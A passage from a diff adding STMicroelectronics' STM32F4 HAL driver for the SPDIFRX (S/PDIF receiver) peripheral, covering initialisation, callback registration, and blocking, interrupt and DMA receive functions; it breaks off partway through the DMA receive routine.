HAL_SPDIFRX_Init() function. + + When The compilation define USE_HAL_SPDIFRX_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup SPDIFRX SPDIFRX + * @brief SPDIFRX HAL module driver + * @{ + */ + +#ifdef HAL_SPDIFRX_MODULE_ENABLED +#if defined (SPDIFRX) +#if defined(STM32F446xx) +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +#define SPDIFRX_TIMEOUT_VALUE 0xFFFFU + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup SPDIFRX_Private_Functions + * @{ + */ +static void SPDIFRX_DMARxCplt(DMA_HandleTypeDef *hdma); +static void SPDIFRX_DMARxHalfCplt(DMA_HandleTypeDef *hdma); +static void SPDIFRX_DMACxCplt(DMA_HandleTypeDef *hdma); +static void SPDIFRX_DMACxHalfCplt(DMA_HandleTypeDef *hdma); +static void SPDIFRX_DMAError(DMA_HandleTypeDef *hdma); +static void SPDIFRX_ReceiveControlFlow_IT(SPDIFRX_HandleTypeDef *hspdif); +static void SPDIFRX_ReceiveDataFlow_IT(SPDIFRX_HandleTypeDef *hspdif); +static HAL_StatusTypeDef SPDIFRX_WaitOnFlagUntilTimeout(SPDIFRX_HandleTypeDef *hspdif, uint32_t Flag, FlagStatus Status, uint32_t Timeout, uint32_t tickstart); +/** + * @} + */ +/* Exported functions ---------------------------------------------------------*/ + +/** @defgroup SPDIFRX_Exported_Functions SPDIFRX Exported Functions + * @{ + */ + +/** @defgroup SPDIFRX_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * + @verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This subsection provides a set of functions allowing to initialize and + de-initialize the SPDIFRX peripheral: + + (+) User must Implement HAL_SPDIFRX_MspInit() function in which he configures + all related peripherals resources (CLOCK, GPIO, DMA, IT and NVIC ). + + (+) Call the function HAL_SPDIFRX_Init() to configure the SPDIFRX peripheral with + the selected configuration: + (++) Input Selection (IN0, IN1,...) + (++) Maximum allowed re-tries during synchronization phase + (++) Wait for activity on SPDIF selected input + (++) Channel status selection (from channel A or B) + (++) Data format (LSB, MSB, ...) + (++) Stereo mode + (++) User bits masking (PT,C,U,V,...) + + (+) Call the function HAL_SPDIFRX_DeInit() to restore the default configuration + of the selected SPDIFRXx peripheral. + @endverbatim + * @{ + */ + +/** + * @brief Initializes the SPDIFRX according to the specified parameters + * in the SPDIFRX_InitTypeDef and create the associated handle. + * @param hspdif SPDIFRX handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_Init(SPDIFRX_HandleTypeDef *hspdif) +{ + uint32_t tmpreg; + + /* Check the SPDIFRX handle allocation */ + if(hspdif == NULL) + { + return HAL_ERROR; + } + + /* Check the SPDIFRX parameters */ + assert_param(IS_STEREO_MODE(hspdif->Init.StereoMode)); + assert_param(IS_SPDIFRX_INPUT_SELECT(hspdif->Init.InputSelection)); + assert_param(IS_SPDIFRX_MAX_RETRIES(hspdif->Init.Retries)); + assert_param(IS_SPDIFRX_WAIT_FOR_ACTIVITY(hspdif->Init.WaitForActivity)); + assert_param(IS_SPDIFRX_CHANNEL(hspdif->Init.ChannelSelection)); + assert_param(IS_SPDIFRX_DATA_FORMAT(hspdif->Init.DataFormat)); + assert_param(IS_PREAMBLE_TYPE_MASK(hspdif->Init.PreambleTypeMask)); + assert_param(IS_CHANNEL_STATUS_MASK(hspdif->Init.ChannelStatusMask)); + assert_param(IS_VALIDITY_MASK(hspdif->Init.ValidityBitMask)); + assert_param(IS_PARITY_ERROR_MASK(hspdif->Init.ParityErrorMask)); + +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) + if(hspdif->State == HAL_SPDIFRX_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hspdif->Lock = HAL_UNLOCKED; + + hspdif->RxHalfCpltCallback = HAL_SPDIFRX_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + hspdif->RxCpltCallback = HAL_SPDIFRX_RxCpltCallback; /* Legacy weak RxCpltCallback */ + hspdif->CxHalfCpltCallback = HAL_SPDIFRX_CxHalfCpltCallback; /* Legacy weak CxHalfCpltCallback */ + hspdif->CxCpltCallback = HAL_SPDIFRX_CxCpltCallback; /* Legacy weak CxCpltCallback */ + hspdif->ErrorCallback = HAL_SPDIFRX_ErrorCallback; /* Legacy weak ErrorCallback */ + + if(hspdif->MspInitCallback == NULL) + { + hspdif->MspInitCallback = HAL_SPDIFRX_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware */ + hspdif->MspInitCallback(hspdif); + } +#else + if(hspdif->State == HAL_SPDIFRX_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hspdif->Lock = HAL_UNLOCKED; + /* Init the low level hardware : GPIO, CLOCK, CORTEX...etc */ + HAL_SPDIFRX_MspInit(hspdif); + } +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ + + /* SPDIFRX peripheral state is BUSY */ + hspdif->State = HAL_SPDIFRX_STATE_BUSY; + + /* Disable SPDIFRX interface (IDLE State) */ + __HAL_SPDIFRX_IDLE(hspdif); + + /* Reset the old SPDIFRX CR configuration */ + tmpreg = hspdif->Instance->CR; + + tmpreg &= ~(SPDIFRX_CR_RXSTEO | SPDIFRX_CR_DRFMT | SPDIFRX_CR_PMSK | + SPDIFRX_CR_VMSK | SPDIFRX_CR_CUMSK | SPDIFRX_CR_PTMSK | + SPDIFRX_CR_CHSEL | SPDIFRX_CR_NBTR | SPDIFRX_CR_WFA | + SPDIFRX_CR_INSEL); + + /* Sets the new configuration of the SPDIFRX peripheral */ + tmpreg |= (hspdif->Init.StereoMode | + hspdif->Init.InputSelection | + hspdif->Init.Retries | + hspdif->Init.WaitForActivity | + hspdif->Init.ChannelSelection | + hspdif->Init.DataFormat | + hspdif->Init.PreambleTypeMask | + hspdif->Init.ChannelStatusMask | + hspdif->Init.ValidityBitMask | + hspdif->Init.ParityErrorMask + ); + + + hspdif->Instance->CR = tmpreg; + + hspdif->ErrorCode = HAL_SPDIFRX_ERROR_NONE; + + /* SPDIFRX peripheral state is READY*/ + hspdif->State = HAL_SPDIFRX_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the SPDIFRX peripheral + * @param hspdif SPDIFRX handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_DeInit(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Check the SPDIFRX handle allocation */ + if(hspdif == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SPDIFRX_ALL_INSTANCE(hspdif->Instance)); + + hspdif->State = HAL_SPDIFRX_STATE_BUSY; + + /* Disable SPDIFRX interface (IDLE state) */ + __HAL_SPDIFRX_IDLE(hspdif); + +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) + if(hspdif->MspDeInitCallback == NULL) + { + hspdif->MspDeInitCallback = HAL_SPDIFRX_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware */ + hspdif->MspDeInitCallback(hspdif); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC... */ + HAL_SPDIFRX_MspDeInit(hspdif); +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ + + hspdif->ErrorCode = HAL_SPDIFRX_ERROR_NONE; + + /* SPDIFRX peripheral state is RESET*/ + hspdif->State = HAL_SPDIFRX_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hspdif); + + return HAL_OK; +} + +/** + * @brief SPDIFRX MSP Init + * @param hspdif SPDIFRX handle + * @retval None + */ +__weak void HAL_SPDIFRX_MspInit(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspdif); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SPDIFRX_MspInit could be implemented in the user file + */ +} + +/** + * @brief SPDIFRX MSP DeInit + * @param hspdif SPDIFRX handle + * @retval None + */ +__weak void HAL_SPDIFRX_MspDeInit(SPDIFRX_HandleTypeDef *hspdif) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspdif); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SPDIFRX_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_SPDIFRX_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User SPDIFRX Callback + * To be used instead of the weak predefined callback + * @param hspdif SPDIFRX handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_SPDIFRX_RX_HALF_CB_ID SPDIFRX Data flow half completed callback ID + * @arg @ref HAL_SPDIFRX_RX_CPLT_CB_ID SPDIFRX Data flow completed callback ID + * @arg @ref HAL_SPDIFRX_CX_HALF_CB_ID SPDIFRX Control flow half completed callback ID + * @arg @ref HAL_SPDIFRX_CX_CPLT_CB_ID SPDIFRX Control flow completed callback ID + * @arg @ref HAL_SPDIFRX_ERROR_CB_ID SPDIFRX error callback ID + * @arg @ref HAL_SPDIFRX_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_SPDIFRX_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_RegisterCallback(SPDIFRX_HandleTypeDef *hspdif, HAL_SPDIFRX_CallbackIDTypeDef CallbackID, pSPDIFRX_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + /* Update the error code */ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hspdif); + + if(HAL_SPDIFRX_STATE_READY == hspdif->State) + { + switch (CallbackID) + { + case HAL_SPDIFRX_RX_HALF_CB_ID : + hspdif->RxHalfCpltCallback = pCallback; + break; + + case HAL_SPDIFRX_RX_CPLT_CB_ID : + hspdif->RxCpltCallback = pCallback; + break; + + case HAL_SPDIFRX_CX_HALF_CB_ID : + hspdif->CxHalfCpltCallback = pCallback; + break; + + case HAL_SPDIFRX_CX_CPLT_CB_ID : + hspdif->CxCpltCallback = pCallback; + break; + + case HAL_SPDIFRX_ERROR_CB_ID : + hspdif->ErrorCallback = pCallback; + break; + + case HAL_SPDIFRX_MSPINIT_CB_ID : + hspdif->MspInitCallback = pCallback; + break; + + case HAL_SPDIFRX_MSPDEINIT_CB_ID : + hspdif->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if(HAL_SPDIFRX_STATE_RESET == hspdif->State) + { + switch (CallbackID) + { + case HAL_SPDIFRX_MSPINIT_CB_ID : + hspdif->MspInitCallback = pCallback; + break; + + case HAL_SPDIFRX_MSPDEINIT_CB_ID : + hspdif->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hspdif); + return status; +} + +/** + * @brief Unregister a SPDIFRX Callback + * SPDIFRX callabck is redirected to the weak predefined callback + * @param hspdif SPDIFRX handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_SPDIFRX_RX_HALF_CB_ID SPDIFRX Data flow half completed callback ID + * @arg @ref HAL_SPDIFRX_RX_CPLT_CB_ID SPDIFRX Data flow completed callback ID + * @arg @ref HAL_SPDIFRX_CX_HALF_CB_ID SPDIFRX Control flow half completed callback ID + * @arg @ref HAL_SPDIFRX_CX_CPLT_CB_ID SPDIFRX Control flow completed callback ID + * @arg @ref HAL_SPDIFRX_ERROR_CB_ID SPDIFRX error callback ID + * @arg @ref HAL_SPDIFRX_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_SPDIFRX_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_UnRegisterCallback(SPDIFRX_HandleTypeDef *hspdif, HAL_SPDIFRX_CallbackIDTypeDef CallbackID) +{ +HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hspdif); + + if(HAL_SPDIFRX_STATE_READY == hspdif->State) + { + switch (CallbackID) + { + case HAL_SPDIFRX_RX_HALF_CB_ID : + hspdif->RxHalfCpltCallback = HAL_SPDIFRX_RxHalfCpltCallback; + break; + + case HAL_SPDIFRX_RX_CPLT_CB_ID : + hspdif->RxCpltCallback = HAL_SPDIFRX_RxCpltCallback; + break; + + case HAL_SPDIFRX_CX_HALF_CB_ID : + hspdif->CxHalfCpltCallback = HAL_SPDIFRX_CxHalfCpltCallback; + break; + + case HAL_SPDIFRX_CX_CPLT_CB_ID : + hspdif->CxCpltCallback = HAL_SPDIFRX_CxCpltCallback; + break; + + case HAL_SPDIFRX_ERROR_CB_ID : + hspdif->ErrorCallback = HAL_SPDIFRX_ErrorCallback; + break; + + default : + /* Update the error code */ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if(HAL_SPDIFRX_STATE_RESET == hspdif->State) + { + switch (CallbackID) + { + case HAL_SPDIFRX_MSPINIT_CB_ID : + hspdif->MspInitCallback = HAL_SPDIFRX_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_SPDIFRX_MSPDEINIT_CB_ID : + hspdif->MspDeInitCallback = HAL_SPDIFRX_MspDeInit; /* Legacy weak MspInit */ + break; + + default : + /* Update the error code */ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hspdif->ErrorCode |= HAL_SPDIFRX_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hspdif); + return status; +} + +#endif /* USE_HAL_SPDIFRX_REGISTER_CALLBACKS */ + +/** + * @brief Set the SPDIFRX data format according to the specified parameters in the SPDIFRX_InitTypeDef. + * @param hspdif SPDIFRX handle + * @param sDataFormat SPDIFRX data format + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_SetDataFormat(SPDIFRX_HandleTypeDef *hspdif, SPDIFRX_SetDataFormatTypeDef sDataFormat) +{ + uint32_t tmpreg; + + /* Check the SPDIFRX handle allocation */ + if(hspdif == NULL) + { + return HAL_ERROR; + } + + /* Check the SPDIFRX parameters */ + assert_param(IS_STEREO_MODE(sDataFormat.StereoMode)); + assert_param(IS_SPDIFRX_DATA_FORMAT(sDataFormat.DataFormat)); + assert_param(IS_PREAMBLE_TYPE_MASK(sDataFormat.PreambleTypeMask)); + assert_param(IS_CHANNEL_STATUS_MASK(sDataFormat.ChannelStatusMask)); + assert_param(IS_VALIDITY_MASK(sDataFormat.ValidityBitMask)); + assert_param(IS_PARITY_ERROR_MASK(sDataFormat.ParityErrorMask)); + + /* Reset the old SPDIFRX CR configuration */ + tmpreg = hspdif->Instance->CR; + + if(((tmpreg & SPDIFRX_STATE_RCV) == SPDIFRX_STATE_RCV) && + (((tmpreg & SPDIFRX_CR_DRFMT) != sDataFormat.DataFormat) || + ((tmpreg & SPDIFRX_CR_RXSTEO) != sDataFormat.StereoMode))) + { + return HAL_ERROR; + } + + tmpreg &= ~(SPDIFRX_CR_RXSTEO | SPDIFRX_CR_DRFMT | SPDIFRX_CR_PMSK | + SPDIFRX_CR_VMSK | SPDIFRX_CR_CUMSK | SPDIFRX_CR_PTMSK); + + /* Configure the new data format */ + tmpreg |= (sDataFormat.StereoMode | + sDataFormat.DataFormat | + sDataFormat.PreambleTypeMask | + sDataFormat.ChannelStatusMask | + sDataFormat.ValidityBitMask | + sDataFormat.ParityErrorMask); + + hspdif->Instance->CR = tmpreg; + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup SPDIFRX_Exported_Functions_Group2 IO operation functions + * @brief Data transfers functions + * +@verbatim +=============================================================================== + ##### IO operation functions ##### +=============================================================================== + [..] + This subsection provides a set of functions allowing to manage the SPDIFRX data + transfers. + + (#) There is two mode of transfer: + (++) Blocking mode : The communication is performed in the polling mode. + The status of all data processing is returned by the same function + after finishing transfer. + (++) No-Blocking mode : The communication is performed using Interrupts + or DMA. These functions return the status of the transfer start-up. + The end of the data processing will be indicated through the + dedicated SPDIFRX IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + + (#) Blocking mode functions are : + (++) HAL_SPDIFRX_ReceiveDataFlow() + (++) HAL_SPDIFRX_ReceiveControlFlow() + (+@) Do not use blocking mode to receive both control and data flow at the same time. + + (#) No-Blocking mode functions with Interrupt are : + (++) HAL_SPDIFRX_ReceiveControlFlow_IT() + (++) HAL_SPDIFRX_ReceiveDataFlow_IT() + + (#) No-Blocking mode functions with DMA are : + (++) HAL_SPDIFRX_ReceiveControlFlow_DMA() + (++) HAL_SPDIFRX_ReceiveDataFlow_DMA() + + (#) A set of Transfer Complete Callbacks are provided in No_Blocking mode: + (++) HAL_SPDIFRX_RxCpltCallback() + (++) HAL_SPDIFRX_CxCpltCallback() + +@endverbatim +* @{ +*/ + +/** + * @brief Receives an amount of data (Data Flow) in blocking mode. + * @param hspdif pointer to SPDIFRX_HandleTypeDef structure that contains + * the configuration information for SPDIFRX module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be received + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_ReceiveDataFlow(SPDIFRX_HandleTypeDef *hspdif, uint32_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint32_t tickstart; + uint16_t sizeCounter = Size; + uint32_t *pTmpBuf = pData; + + if((pData == NULL ) || (Size == 0U)) + { + return HAL_ERROR; + } + + if(hspdif->State == HAL_SPDIFRX_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hspdif); + + hspdif->State = HAL_SPDIFRX_STATE_BUSY; + + /* Start synchronisation */ + __HAL_SPDIFRX_SYNC(hspdif); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until SYNCD flag is set */ + if(SPDIFRX_WaitOnFlagUntilTimeout(hspdif, SPDIFRX_FLAG_SYNCD, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* Start reception */ + __HAL_SPDIFRX_RCV(hspdif); + + /* Receive data flow */ + while(sizeCounter > 0U) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until RXNE flag is set */ + if(SPDIFRX_WaitOnFlagUntilTimeout(hspdif, SPDIFRX_FLAG_RXNE, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_TIMEOUT; + } + + (*pTmpBuf) = hspdif->Instance->DR; + pTmpBuf++; + sizeCounter--; + } + + /* SPDIFRX ready */ + hspdif->State = HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receives an amount of data (Control Flow) in blocking mode. + * @param hspdif pointer to a SPDIFRX_HandleTypeDef structure that contains + * the configuration information for SPDIFRX module. + * @param pData Pointer to data buffer + * @param Size Amount of data to be received + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_ReceiveControlFlow(SPDIFRX_HandleTypeDef *hspdif, uint32_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint32_t tickstart; + uint16_t sizeCounter = Size; + uint32_t *pTmpBuf = pData; + + if((pData == NULL ) || (Size == 0U)) + { + return HAL_ERROR; + } + + if(hspdif->State == HAL_SPDIFRX_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hspdif); + + hspdif->State = HAL_SPDIFRX_STATE_BUSY; + + /* Start synchronization */ + __HAL_SPDIFRX_SYNC(hspdif); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until SYNCD flag is set */ + if(SPDIFRX_WaitOnFlagUntilTimeout(hspdif, SPDIFRX_FLAG_SYNCD, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* Start reception */ + __HAL_SPDIFRX_RCV(hspdif); + + /* Receive control flow */ + while(sizeCounter > 0U) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until CSRNE flag is set */ + if(SPDIFRX_WaitOnFlagUntilTimeout(hspdif, SPDIFRX_FLAG_CSRNE, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_TIMEOUT; + } + + (*pTmpBuf) = hspdif->Instance->CSR; + pTmpBuf++; + sizeCounter--; + } + + /* SPDIFRX ready */ + hspdif->State = HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data (Data Flow) in non-blocking mode with Interrupt + * @param hspdif SPDIFRX handle + * @param pData a 32-bit pointer to the Receive data buffer. + * @param Size number of data sample to be received . + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_ReceiveDataFlow_IT(SPDIFRX_HandleTypeDef *hspdif, uint32_t *pData, uint16_t Size) +{ + uint32_t count = SPDIFRX_TIMEOUT_VALUE * (SystemCoreClock / 24U / 1000U); + + const HAL_SPDIFRX_StateTypeDef tempState = hspdif->State; + + if((tempState == HAL_SPDIFRX_STATE_READY) || (tempState == HAL_SPDIFRX_STATE_BUSY_CX)) + { + if((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hspdif); + + hspdif->pRxBuffPtr = pData; + hspdif->RxXferSize = Size; + hspdif->RxXferCount = Size; + + hspdif->ErrorCode = HAL_SPDIFRX_ERROR_NONE; + + /* Check if a receive process is ongoing or not */ + hspdif->State = HAL_SPDIFRX_STATE_BUSY_RX; + + /* Enable the SPDIFRX PE Error Interrupt */ + __HAL_SPDIFRX_ENABLE_IT(hspdif, SPDIFRX_IT_PERRIE); + + /* Enable the SPDIFRX OVR Error Interrupt */ + __HAL_SPDIFRX_ENABLE_IT(hspdif, SPDIFRX_IT_OVRIE); + + /* Enable the SPDIFRX RXNE interrupt */ + __HAL_SPDIFRX_ENABLE_IT(hspdif, SPDIFRX_IT_RXNE); + + if((SPDIFRX->CR & SPDIFRX_CR_SPDIFEN) != SPDIFRX_STATE_RCV) + { + /* Start synchronization */ + __HAL_SPDIFRX_SYNC(hspdif); + + /* Wait until SYNCD flag is set */ + do + { + if (count == 0U) + { + /* Disable TXE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts for the interrupt process */ + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_RXNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_CSRNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_PERRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_OVRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SBLKIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SYNCDIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_IFEIE); + + hspdif->State= HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_TIMEOUT; + } + count--; + } while (__HAL_SPDIFRX_GET_FLAG(hspdif, SPDIFRX_FLAG_SYNCD) == RESET); + + /* Start reception */ + __HAL_SPDIFRX_RCV(hspdif); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data (Control Flow) with Interrupt + * @param hspdif SPDIFRX handle + * @param pData a 32-bit pointer to the Receive data buffer. + * @param Size number of data sample (Control Flow) to be received + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_ReceiveControlFlow_IT(SPDIFRX_HandleTypeDef *hspdif, uint32_t *pData, uint16_t Size) +{ + uint32_t count = SPDIFRX_TIMEOUT_VALUE * (SystemCoreClock / 24U / 1000U); + + const HAL_SPDIFRX_StateTypeDef tempState = hspdif->State; + + if((tempState == HAL_SPDIFRX_STATE_READY) || (tempState == HAL_SPDIFRX_STATE_BUSY_RX)) + { + if((pData == NULL ) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hspdif); + + hspdif->pCsBuffPtr = pData; + hspdif->CsXferSize = Size; + hspdif->CsXferCount = Size; + + hspdif->ErrorCode = HAL_SPDIFRX_ERROR_NONE; + + /* Check if a receive process is ongoing or not */ + hspdif->State = HAL_SPDIFRX_STATE_BUSY_CX; + + /* Enable the SPDIFRX PE Error Interrupt */ + __HAL_SPDIFRX_ENABLE_IT(hspdif, SPDIFRX_IT_PERRIE); + + /* Enable the SPDIFRX OVR Error Interrupt */ + __HAL_SPDIFRX_ENABLE_IT(hspdif, SPDIFRX_IT_OVRIE); + + /* Enable the SPDIFRX CSRNE interrupt */ + __HAL_SPDIFRX_ENABLE_IT(hspdif, SPDIFRX_IT_CSRNE); + + if((SPDIFRX->CR & SPDIFRX_CR_SPDIFEN) != SPDIFRX_STATE_RCV) + { + /* Start synchronization */ + __HAL_SPDIFRX_SYNC(hspdif); + + /* Wait until SYNCD flag is set */ + do + { + if (count == 0U) + { + /* Disable TXE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts for the interrupt process */ + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_RXNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_CSRNE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_PERRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_OVRIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SBLKIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_SYNCDIE); + __HAL_SPDIFRX_DISABLE_IT(hspdif, SPDIFRX_IT_IFEIE); + + hspdif->State= HAL_SPDIFRX_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_TIMEOUT; + } + count--; + } while (__HAL_SPDIFRX_GET_FLAG(hspdif, SPDIFRX_FLAG_SYNCD) == RESET); + + /* Start reception */ + __HAL_SPDIFRX_RCV(hspdif); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data (Data Flow) mode with DMA + * @param hspdif SPDIFRX handle + * @param pData a 32-bit pointer to the Receive data buffer. + * @param Size number of data sample to be received + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPDIFRX_ReceiveDataFlow_DMA(SPDIFRX_HandleTypeDef *hspdif, uint32_t *pData, uint16_t Size) +{ + uint32_t count = SPDIFRX_TIMEOUT_VALUE * (SystemCoreClock / 24U / 1000U); + + const HAL_SPDIFRX_StateTypeDef tempState = hspdif->State; + + if((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + if((tempState == HAL_SPDIFRX_STATE_READY) || (tempState == HAL_SPDIFRX_STATE_BUSY_CX)) + { + /* Process Locked */ + __HAL_LOCK(hspdif); + + hspdif->pRxBuffPtr = pData; + hspdif->RxXferSize = Size; + hspdif->RxXferCount = Size; + + hspdif->ErrorCode = HAL_SPDIFRX_ERROR_NONE; + hspdif->State = HAL_SPDIFRX_STATE_BUSY_RX; + + /* Set the SPDIFRX Rx DMA Half transfer complete callback */ + hspdif->hdmaDrRx->XferHalfCpltCallback = SPDIFRX_DMARxHalfCplt; + + /* Set the SPDIFRX Rx DMA transfer complete callback */ + hspdif->hdmaDrRx->XferCpltCallback = SPDIFRX_DMARxCplt; + + /* Set the DMA error callback */ + hspdif->hdmaDrRx->XferErrorCallback = SPDIFRX_DMAError; + + /* Enable the DMA request */ + if(HAL_DMA_Start_IT(hspdif->hdmaDrRx, (uint32_t)&hspdif->Instance->DR, (uint32_t)hspdif->pRxBuffPtr, Size) != HAL_OK) + { + /* Set SPDIFRX error */ + hspdif->ErrorCode = HAL_SPDIFRX_ERROR_DMA; + + /* Set SPDIFRX state */ + hspdif->State = HAL_SPDIFRX_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hspdif); + + return HAL_ERROR; + } + + /* Enable RXDMAEN bit in SPDIFRX CR register for data flow reception*/ + hspdif->Instance->CR |= SPDIFRX_CR_RXDMAEN; + + if((SPDIFRX->CR & SPDIFRX_CR_SPDIFEN) != SPDIFRX_STATE_RCV) + { + /* Start synchronization */ + __HAL_SPDIFRX_SYNC(hspdif); + + /* Wait until SYNCD 